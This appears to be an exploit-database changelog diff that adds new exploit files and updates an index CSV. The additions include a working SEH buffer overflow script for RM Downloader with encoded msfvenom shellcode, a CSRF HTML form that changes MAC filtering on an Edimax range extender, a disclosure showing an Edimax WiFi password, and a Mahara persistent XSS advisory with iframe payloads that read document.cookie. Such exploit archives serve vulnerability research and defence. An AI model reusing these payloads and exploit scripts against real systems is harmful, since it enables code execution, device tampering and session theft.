DB: 2020-04-23

5 changes to exploits/shellcodes

Vesta Control Panel 0.9.8-16 - Local Privilege Escalation

RM Downloader 3.1.3.2.2010.06.13 - 'Load' Buffer Overflow (SEH)
Edimax EW-7438RPn - Information Disclosure (WiFi Password)
Edimax EW-7438RPn - Cross-Site Request Forgery (MAC Filtering)
Mahara 19.10.2 CMS - Persistent Cross-Site Scripting

exploits/hardware/webapps/48365.txt

@@ -0,0 +1,94 @@
+# Exploit Title: Edimax EW-7438RPn 1.13 - Information Disclosure (WiFi Password)
+# Date: 2020-04-21
+# Exploit Author: Besim ALTINOK
+# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/
+# Version:1.13
+# Tested on: Edimax EW-7438RPn 1.13 Version
+
+-----------------------------
+Here step by step :
+
+   1. I did Setup
+   2. After setup try to access to *wlencrypt_wiz.asp* file
+   3. After access to this file, I saw some information disclosure
+(Like *WiFi Password*)
+   4. Here is the all leak here:
+
+-------------------------------
+
+<SCRIPT>
+var _DATE_="Mon Sep 24 19:38:17 CST 2012";
+var _VERSION_="1.13";
+var _MODEL_="EW7438RPN";
+var _MODE_="Edimax";
+var _PLATFORM_="RTL8196CS_1200";
+var _HW_LED_WPS_="4";
+var _HW_LED_POWER_="6";
+var _HW_LED_WIRELESS_="2";
+var _HW_BUTTON_RESET_="5";
+var _HW_BUTTON_WPS_="1";
+var _HW_BUTTON_SWITCH_="3";
+var _HW_LED_USB_="17";
+var _WIRELESS_IGMPSNOOP_="y";
+var _SPECIAL_CHAR_FILTER_IN_SCRIPT_="y";
+var _RDISC_="y";
+var _WPS_NO_BROADCAST_="y";
+var _UPNP_LIB_VERSION2_="y";
+var _WDS_UR_INFO_="y";
+var _RESERVE_ENCRYPTION_SETTING_="y";
+var _IGMP_PROXY_="y";
+var _IGMPSNOOP_="y";
+var _RFTYPE_="2T2R";
+var _MEMBUS_="16";
+var _MEMSIZE_="16";
+var _MEMTYPE_="SDRAM";
+var _FLASHTYPE_="SPI";
+var _REMOVE_RADIUS_SERVER_="y";
+var _AUTO_CHANNEL_DET_="y";
+var _CONTROL_SIDEBAND_="y";
+var _WIFI_11N_STANDARD_="y";
+var _SETTING_WIZARD_="y";
+var _CONFIG_FILE_NAME_="7438RPN";
+var _AP_WITH_DNS_="y";
+var _USE_DNRD_="y";
+var _WPS_MIX_="y";
+var _POWER_SAVING_="y";
+var _WEB_FILE_NAME_="7438RPN";
+var _PINCODE_BY_MAC_="y";
+var _UPNP_RESPONDER_="y";
+var _MDNS_RESPONDER_="y";
+var _NETBIOS_RESPONDER_="y";
+var _AP_WITH_DHCP_CLIENT_="y";
+var _LLTD_NODENAME_="y";
+var _DHCP_SWITCH_="y";
+var _CONNECT_TEST_="y";
+var _START_BOA_="y";
+var _WPS_Daemon_="y";
+
+var security = 1;
+apMode = 6;
+methodVal = 2;
+opMode = 0;
+apMachType = 1;
+
+var ssidTbl = 		new Array("PentesterTraining");
+var mirrorTbl =		"";
+var secModeTbl = 	new Array("2");
+var enable1XTbl = 	new Array("0");
+var _1xMode =		"0";
+var wepTbl =		new Array("0");
+var keyTypeTbl =	new Array("1");
+var wpaCipherTbl =	new Array("2");
+var pskFormatTbl =	new Array("0");
+var pskValueTbl =	new Array("wifipass123.");
+var defaultKeyIdTbl=new Array("0");
+var rsIp=		"";
+var rsPort=		"1812";
+var rsPassword=		"";
+
+
+-- 
+
+Besim ALTINOK
+
+*Security Engineer*

exploits/hardware/webapps/48366.txt

@@ -0,0 +1,32 @@
+# Exploit Title: Edimax EW-7438RPn - Cross-Site Request Forgery (MAC Filtering)
+# Date: 2020-04-21
+# Exploit Author: Besim ALTINOK
+# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/
+# Version:1.13
+# Tested on: Edimax EW-7438RPn 1.13 Version
+
+
+CSRF PoC - Mac Filtering
+----------------------------------------------------------------------------------------------------------
+<html>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://172.20.10.2/goform/formWlAc" method="POST">
+      <input type="hidden" name="wlanAcEnabled" value="ON" />
+      <input type="hidden" name="tiny&#95;idx" value="0" />
+      <input type="hidden" name="mac" value="ccbbbbbbbbbb" />
+      <input type="hidden" name="comment" value="PentesterTraining" />
+      <input type="hidden" name="addFilterMac" value="Add" />
+      <input type="hidden" name="submit&#45;url"
+value="&#47;macfilter1&#95;sub1&#46;asp" />
+      <input type="hidden" name="wlanSSIDIndex" value="1" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
+
+-- 
+
+Besim ALTINOK
+
+*Security Engineer*

exploits/linux/local/40953.sh

@@ -2,7 +2,7 @@
 # 
 # Exploit Title: Vesta Control Panel 0.9.7 <= 0.9.8-16 Local Privilege Escalation Exploit
 # Google Dork: vesta control panel inurl:8083
-# Exploit Author: Luka Pusic, Jaka Hudoklin @offlinehacker
+# Exploit Author: Jaka Hudoklin @offlinehacker
 # Vendor Homepage: http://vestacp.com/
 # Software Link: https://github.com/serghey-rodin/vesta
 # Version: 0.9.7 - 0.9.8-16

exploits/linux/webapps/48367.txt

@@ -0,0 +1,248 @@
+# Title: Mahara 19.10.2 CMS - Persistent Cross-Site Scripting
+# Author: Vulnerability Laboratory
+# Date: 2020-04-21
+# Vendor: https://mahara.org
+# Software Link: https://launchpad.net/mahara
+# CVE: N/A
+
+Document Title:
+===============
+Mahara v19.10.2 CMS - Persistent Cross Site Vulnerability
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2217
+
+Release Date:
+=============
+2020-04-21
+
+Common Vulnerability Scoring System:
+====================================
+4.3
+
+Affected Product(s):
+====================
+Catalyst IT Ltd.
+Product: Mahara v19.10.2 - CMS (Web-Application)
+https://launchpad.net/mahara & https://mahara.org
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-04-21: Public Disclosure (Vulnerability Laboratory)
+
+
+Technical Details & Description:
+================================
+A persistent input validation web vulnerability has been discovered in
+the official Mahara v19.10.2 CMS web-application series.
+The vulnerability allows remote attackers to inject own malicious script
+codes with persistent attack vector to compromise browser
+to web-application requests from the application-side.
+
+The persistent vulnerability is located in the `nombre` and
+`descripción` parameters of the `Ficheros` module in the
+`groupfiles.php` file.
+Remote attackers with low privileges are able to inject own malicious
+persistent script code as files and foldernames. The injected code can
+be used to attack the frontend or backend of the web-application. The
+request method to inject is POST and the attack vector is located on
+the application-side. Files are able to be reviewed in the backend by
+higher privileged accounts and can be shared.
+
+Successful exploitation of the vulnerabilities results in session
+hijacking, persistent phishing attacks, persistent external redirects to
+malicious source and persistent manipulation of affected application
+modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] Ficheros (Files Manager)
+
+Vulnerable Input(s):
+[+] Crear Carpeta
+
+Vulnerable File(s):
+[+] groupfiles.php
+
+
+Vulnerable Parameter(s):
+[+] nombre
+[+] descripción
+
+Affected Module(s):
+[+] Página principal
+
+
+Proof of Concept (PoC):
+=======================
+The persistent web vulnerability can be exploited by low privileged web
+application user account with low user interaction.
+For security demonstration or to reproduce the vulnerability follow the
+provided information and steps below to continue.
+
+
+Manual steps to reproduce ...
+1. Open the web-application and login as regular user
+2. Move inside the mygroup management
+3. Open the ficheros tab on top
+4. Inject test payload into the crear carpeta (Nombre & Descripción)
+input field for the página principal to output
+Note: The execution point occurs on edit, list and delete interaction
+5. The created path listings are available for higher privileged user
+account that review (Backend)
+6. Successul reproduce of the persistent cross site web vulnerability!
+
+
+PoC: Vulnerable Source (Inject via Crear Carpeta Input for Página Principal)
+<tr id="file:7191" class="file-item folder no-hover ui-droppable">
+<td class="icon-cell">
+<div class="icon-drag ui-draggable ui-draggable-handle" id="drag:7191"
+tabindex="0">
+<span class="sr-only">Seleccionar y arrastrar para mover >"<iframe
+src=evil.source onload=alert(document.cookie)></iframe>
+>"<iframe src=evil.source
+onload=alert(document.cookie)></iframe></span>
+<span class="icon-folder-open icon icon-lg " role="presentation"
+aria-hidden="true"></span>
+</div></td>
+<td class="filename">
+<a
+href="https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=7191&owner=group&ownerid=27"
+
+id="changefolder:7191" class="inner-link changefolder">
+<span class="sr-only">Carpeta:</span>
+<span class="display-title ">>"<iframe src=evil.source
+onload=alert(document.cookie)></iframe>
+>"<iframe src=evil.source
+onload=alert(document.cookie)></iframe></span>
+</a></td>
+<td class="filedescription d-none d-md-table-cell">
+>"<iframe></iframe>     >"<iframe></iframe></td>
+<td class="filesize"></td>
+<td class="filedate">20/04/2020</td>
+<!-- Ensure space for 3 buttons (in the case of a really long single
+line string in a user input field -->
+<td class="text-right control-buttons ">
+<div class="btn-group">
+...	...
+<button name="files_filebrowser_edit[7191]" class="btn btn-secondary
+btn-sm">
+<span class="icon icon-pencil-alt icon-lg" role="presentation"
+aria-hidden="true"></span>
+<span class="sr-only">Edit folder ">"<iframe
+src=evil.source
+onload=alert(document.cookie)></iframe>
+>"<iframe src=evil.source
+onload=alert(document.cookie)></iframe>"</span></button>
+<button name="files_filebrowser_delete[7191]" class="btn btn-secondary
+btn-sm">
+<span class="icon icon-trash-alt text-danger icon-lg"
+role="presentation" aria-hidden="true"></span>
+<span class="sr-only">Delete folder ">"<iframe
+src=evil.source
+onload=alert(document.cookie)></iframe>
+>"<iframe src=evil.source
+onload=alert(document.cookie)></iframe>"</span>
+</button></div></td>
+
+
+--- PoC Session Logs [POST] --- (Mygroup Ficheros)
+https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=27
+Host: mahara_cms.localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Content-Type: multipart/form-data;
+boundary=---------------------------98107146915324237501974151621
+Content-Length: 4879
+Origin: https://mahara_cms.localhost:8080
+Connection: keep-alive
+Referer:
+https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=27
+Cookie: __cfduid=d6b9845d834027b2fd8a2223c5b559f2f1587303558;
+mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76;
+folder=0&files_filebrowser_changefolder=&files_filebrowser_foldername=Página
+principal&files_filebrowser_uploadnumber=1&files_filebrowser_upload=0&MAX_FILE_SIZE=1610608640&files_filebrowser_license=&
+files_filebrowser_license_other=&files_filebrowser_licensor=&files_filebrowser_licensorurl=&files_filebrowser_resizeonuploaduserenable=on&userfile[]=&files_filebrowser_move=&files_filebrowser_moveto=&files_filebrowser_createfolder_name=&files_filebrowser_edit_orientation=0&
+files_filebrowser_edit_title=>"<iframe src=evil.source
+onload=alert(document.cookie)></iframe>    >"<iframe src=evil.source
+onload=alert(document.cookie)></iframe>&files_filebrowser_edit_description=>"<iframe
+src=evil.source onload=alert(document.cookie)></iframe>
+>"<iframe src=evil.source
+onload=alert(document.cookie)></iframe>&files_filebrowser_permission:member:view=on&files_filebrowser_permission:member:edit=on&
+files_filebrowser_permission:member:republish=on&files_filebrowser_edit_license=&files_filebrowser_edit_license_other=&
+files_filebrowser_edit_licensor=>"<iframe src=evil.source
+onload=alert(document.cookie)></iframe>   >"<iframe src=evil.source
+onload=alert(document.cookie)></iframe>&files_filebrowser_edit_licensorurl=>"<iframe
+src=evil.source onload=alert(document.cookie)></iframe>
+>"<iframe src=evil.source
+onload=alert(document.cookie)></iframe>&files_filebrowser_edit_allowcomments=on&
+files_filebrowser_update[7191]=Guardar
+cambios&sesskey=pFJC0a1dZWsy8rEA&pieform_files=&pieform_jssubmission=1,1,1
+-
+POST: HTTP/2.0 200 OK
+content-type: text/html; charset=UTF-8
+vary: Accept-Encoding
+cache-control: no-store, no-cache, must-revalidate
+set-cookie:
+mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76;
+path=/; secure; HttpOnly
+content-encoding: br
+X-Firefox-Spdy: h2-
+https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=
+-
+Host: mahara_cms.localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Content-Type: multipart/form-data;
+boundary=---------------------------126319663526561351602937008964
+Content-Length: 3721
+Origin: https://mahara_cms.localhost:8080
+Connection: keep-alive
+Referer:
+https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=
+Cookie: __cfduid=d6b9845d834027b2fd8a2223c5b559f2f1587303558;
+mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76;
+folder=0&files_filebrowser_changefolder=&files_filebrowser_foldername=Página
+principal&files_filebrowser_uploadnumber=1&files_filebrowser_upload=0&MAX_FILE_SIZE=1610608640&files_filebrowser_license=&
+files_filebrowser_license_other=&files_filebrowser_licensor=&files_filebrowser_licensorurl=&files_filebrowser_resizeonuploaduserenable=on&userfile[]=&files_filebrowser_move=&files_filebrowser_moveto=&files_filebrowser_createfolder_name=&files_filebrowser_delete[7192]=&files_filebrowser_edit_orientation=0&files_filebrowser_edit_title=&files_filebrowser_edit_description=&files_filebrowser_edit_license=&
+files_filebrowser_edit_license_other=&files_filebrowser_edit_licensor=&files_filebrowser_edit_licensorurl=&
+sesskey=pFJC0a1dZWsy8rEA&pieform_files=&pieform_jssubmission=1,1
+-
+GET: HTTP/2.0 200 OK
+content-type: text/html; charset=UTF-8
+vary: Accept-Encoding
+cache-control: no-store, no-cache, must-revalidate
+set-cookie:
+mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76;
+path=/; secure; HttpOnly
+content-encoding: br
+X-Firefox-Spdy: h2
+
+
+Reference(s):
+https://mahara_cms.localhost:8080/artefact/
+https://mahara_cms.localhost:8080/artefact/file/
+https://mahara_cms.localhost:8080/artefact/file/groupfiles.php
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM

exploits/windows/local/48364.py

@@ -0,0 +1,69 @@
+# Exploit Title: RM Downloader 3.1.3.2.2010.06.13 - 'Load' Buffer Overflow (SEH)
+# Date: 2020-04-20
+# Author: Felipe Winsnes
+# Software Link: https://www.exploit-db.com/apps/9af366e59468eac0b92212912b5c3bcb-RMDownloader.exe
+# Version: 3.1.3.2.2010.06.13
+# Tested on: Windows 7 (x86)
+
+# Proof of Concept:
+# 1.- Run the python script, it will create a new file "poc.txt"
+# 2.- Copy the content of the new file 'poc.txt' to clipboard
+# 3.- Open 'RmDownloader.exe'
+# 4.- Go to 'Load' tab
+# 5.- Paste clipboard in 'Load' parameter
+# 6.- Click on button 'OK'
+# 7.- Two messageboxes regarding the length of the payload will pop up, click OK
+# 8.- Profit
+
+# Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/RM-Downloader-SEH/
+
+import struct
+
+# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread 
+# Payload size: 448 bytes
+
+buf =  b""
+buf += b"\x89\xe3\xda\xd0\xd9\x73\xf4\x5f\x57\x59\x49\x49\x49"
+buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
+buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
+buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
+buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x39\x78\x6b"
+buf += b"\x32\x53\x30\x57\x70\x57\x70\x35\x30\x4d\x59\x4d\x35"
+buf += b"\x46\x51\x79\x50\x72\x44\x4e\x6b\x56\x30\x76\x50\x4c"
+buf += b"\x4b\x50\x52\x66\x6c\x4c\x4b\x66\x32\x72\x34\x4e\x6b"
+buf += b"\x63\x42\x67\x58\x46\x6f\x4e\x57\x71\x5a\x47\x56\x35"
+buf += b"\x61\x4b\x4f\x6c\x6c\x65\x6c\x51\x71\x61\x6c\x73\x32"
+buf += b"\x66\x4c\x31\x30\x7a\x61\x6a\x6f\x54\x4d\x37\x71\x79"
+buf += b"\x57\x4d\x32\x4c\x32\x36\x32\x62\x77\x6c\x4b\x76\x32"
+buf += b"\x42\x30\x4e\x6b\x61\x5a\x45\x6c\x4c\x4b\x42\x6c\x32"
+buf += b"\x31\x42\x58\x4d\x33\x32\x68\x47\x71\x6b\x61\x70\x51"
+buf += b"\x6c\x4b\x61\x49\x47\x50\x33\x31\x4b\x63\x4e\x6b\x30"
+buf += b"\x49\x67\x68\x49\x73\x35\x6a\x30\x49\x6c\x4b\x45\x64"
+buf += b"\x4c\x4b\x35\x51\x69\x46\x45\x61\x4b\x4f\x4c\x6c\x4b"
+buf += b"\x71\x68\x4f\x34\x4d\x66\x61\x69\x57\x34\x78\x59\x70"
+buf += b"\x54\x35\x38\x76\x73\x33\x51\x6d\x39\x68\x35\x6b\x71"
+buf += b"\x6d\x56\x44\x30\x75\x5a\x44\x76\x38\x4c\x4b\x72\x78"
+buf += b"\x54\x64\x33\x31\x38\x53\x70\x66\x6e\x6b\x56\x6c\x70"
+buf += b"\x4b\x4e\x6b\x50\x58\x75\x4c\x55\x51\x78\x53\x4e\x6b"
+buf += b"\x56\x64\x6e\x6b\x73\x31\x6e\x30\x6e\x69\x37\x34\x56"
+buf += b"\x44\x71\x34\x53\x6b\x33\x6b\x63\x51\x61\x49\x73\x6a"
+buf += b"\x56\x31\x6b\x4f\x49\x70\x73\x6f\x31\x4f\x43\x6a\x4e"
+buf += b"\x6b\x67\x62\x6a\x4b\x6e\x6d\x73\x6d\x32\x4a\x46\x61"
+buf += b"\x6c\x4d\x4c\x45\x38\x32\x47\x70\x35\x50\x67\x70\x62"
+buf += b"\x70\x53\x58\x54\x71\x4c\x4b\x52\x4f\x4b\x37\x49\x6f"
+buf += b"\x38\x55\x6d\x6b\x49\x70\x65\x4d\x46\x4a\x75\x5a\x31"
+buf += b"\x78\x79\x36\x7a\x35\x6f\x4d\x6d\x4d\x4b\x4f\x68\x55"
+buf += b"\x65\x6c\x57\x76\x71\x6c\x47\x7a\x4f\x70\x49\x6b\x6b"
+buf += b"\x50\x74\x35\x37\x75\x6d\x6b\x61\x57\x75\x43\x71\x62"
+buf += b"\x72\x4f\x43\x5a\x65\x50\x66\x33\x6b\x4f\x6a\x75\x70"
+buf += b"\x63\x55\x31\x72\x4c\x31\x73\x76\x4e\x72\x45\x43\x48"
+buf += b"\x50\x65\x67\x70\x41\x41"
+
+
+nseh = struct.pack("<I", 0x06710870)
+seh = struct.pack("<I", 0x10031779) # 0x10031779 : pop ebx # pop eax # ret  | ascii {PAGE_EXECUTE_READ} [RDfilter03.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Mini-stream\RM Downloader\RDfilter03.dll)
+
+buffer = "A" * 9008 + nseh + seh + "\x41\x49" * 10 + buf + "\xff" * 200
+f = open ("poc.txt", "w")
+f.write(buffer)
+f.close()

files_exploits.csv

@@ -10112,7 +10112,7 @@ id,file,description,date,author,type,platform,port
 40938,exploits/linux/local/40938.py,"RedStar 3.0 Server - 'Shellshock' 'BEAM' / 'RSSMON' Command Injection",2016-12-18,"Hacker Fantastic",local,linux,
 40943,exploits/linux/local/40943.txt,"Google Chrome (Fedora 25 / Ubuntu 16.04) - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' Drive-By Download",2016-12-13,"Chris Evans",local,linux,
 40950,exploits/aix/local/40950.sh,"IBM AIX 6.1/7.1/7.2 - 'Bellmail' Local Privilege Escalation",2016-12-22,"Hector X. Monsegur",local,aix,
-40953,exploits/linux/local/40953.sh,"Vesta Control Panel 0.9.8-16 - Local Privilege Escalation",2016-12-22,"Luka Pusic",local,linux,
+40953,exploits/linux/local/40953.sh,"Vesta Control Panel 0.9.8-16 - Local Privilege Escalation",2016-12-22,"Jaka Hudoklin",local,linux,
 40956,exploits/macos/local/40956.c,"Apple macOS < 10.12.2 / iOS < 10.2 - '_kernelrpc_mach_port_insert_right_trap' Kernel Reference Count Leak / Use-After-Free",2016-12-22,"Google Security Research",local,macos,
 40957,exploits/macos/local/40957.c,"Apple macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation",2016-12-22,"Google Security Research",local,macos,
 40962,exploits/linux/local/40962.txt,"OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation",2016-12-23,"Google Security Research",local,linux,
@@ -11037,6 +11037,7 @@ id,file,description,date,author,type,platform,port
 48351,exploits/windows/local/48351.py,"Rubo DICOM Viewer 2.0 - Buffer Overflow (SEH)",2020-04-20,bzyo,local,windows,
 48352,exploits/windows/local/48352.txt,"Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path",2020-04-20,boku,local,windows,
 48359,exploits/solaris/local/48359.c,"Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation",2020-04-21,"Marco Ivaldi",local,solaris,
+48364,exploits/windows/local/48364.py,"RM Downloader 3.1.3.2.2010.06.13 - 'Load' Buffer Overflow (SEH)",2020-04-22,"Felipe Winsnes",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42600,3 +42601,6 @@ id,file,description,date,author,type,platform,port
 48360,exploits/json/webapps/48360.txt,"NSClient++ 0.5.2.35 - Authenticated Remote Code Execution",2020-04-21,kindredsec,webapps,json,
 48361,exploits/php/webapps/48361.txt,"jizhi CMS 1.6.7 - Arbitrary File Download",2020-04-21,jizhicms,webapps,php,
 48362,exploits/hardware/webapps/48362.txt,"P5 FNIP-8x16A FNIP-4xSH 1.0.20 - Cross-Site Request Forgery (Add Admin)",2020-04-21,LiquidWorm,webapps,hardware,
+48365,exploits/hardware/webapps/48365.txt,"Edimax EW-7438RPn - Information Disclosure (WiFi Password)",2020-04-22,Besim,webapps,hardware,
+48366,exploits/hardware/webapps/48366.txt,"Edimax EW-7438RPn - Cross-Site Request Forgery (MAC Filtering)",2020-04-22,Besim,webapps,hardware,
+48367,exploits/linux/webapps/48367.txt,"Mahara 19.10.2 CMS - Persistent Cross-Site Scripting",2020-04-22,Vulnerability-Lab,webapps,linux,